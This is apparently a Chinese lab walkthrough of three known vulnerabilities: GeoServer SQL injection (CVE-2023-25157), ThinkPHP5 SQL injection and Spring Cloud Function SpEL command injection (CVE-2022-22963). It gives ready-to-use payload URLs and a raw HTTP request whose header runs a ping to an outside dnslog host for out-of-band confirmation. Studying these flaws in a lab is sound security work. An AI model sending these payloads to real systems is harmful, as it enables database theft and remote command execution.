geoserver SQL注入、Think PHP5 SQL注入、spring命令注入

文章目录

  • [一、geoserver SQL注入CVE-2023-25157](#一、geoserver SQL注入CVE-2023-25157)
  • [二、Think PHP5 SQL注入](#二、Think PHP5 SQL注入)
  • [三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)](#三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963))

一、geoserver SQL注入CVE-2023-25157

介绍GeoServer是一个开源的地理信息系统(GIS)服务器,用于发布、共享和管理地理空间数据和地图服务。它是一个基于Java的应用程序

访问127.0.0.1/geoserver

payload:http://127.0.0.1/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

二、Think PHP5 SQL注入

think php是php开发框架

payload1:

bash 复制代码
http://127.0.0.1/index.php?ids[]=1&ids[]=2 # payload1,显示出用户名
http://127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 # payload2,可以在调试页面找到数据库的账户和密码



thinkphp_gui_tools也是可以检测出该SQL注入漏洞的。

三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)

spring是一个java框架~

直接访问127.0.0.1:8080是一个错误页面。

直接发送下面的数据包:

php 复制代码
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping sf4rrw.dnslog.cn")
Content-Type: text/plain
Content-Length: 8

test


相关推荐
禾木KG14 分钟前
网络安全-等级保护(等保) 1-0 等级保护制度公安部前期发文总结
网络安全
网络抓包与爬虫36 分钟前
Wireshark——抓包分析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
仙女很美哦2 小时前
Flutter视频播放、Flutter VideoPlayer 视频播放组件精要
websocket·网络协议·tcp/ip·http·网络安全·https·udp
CYRUS STUDIO3 小时前
Unidbg Trace 反 OLLVM 控制流平坦化(fla)
android·汇编·算法·网络安全·逆向·ollvm
写代码的小王吧3 小时前
【Java可执行命令】(十)JAR文件签名工具 jarsigner:通过数字签名及验证保证代码信任与安全,深入解析 Java的 jarsigner命令~
java·开发语言·网络·安全·web安全·网络安全·jar
iOS技术狂热者7 小时前
Flutter 音视频播放器与弹幕系统开发实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
予安灵8 小时前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
网络抓包与爬虫9 小时前
flutter WEB端启动优化(加载速度,加载动画)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网络抓包与爬虫9 小时前
从头开发一个Flutter插件(二)高德地图定位插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp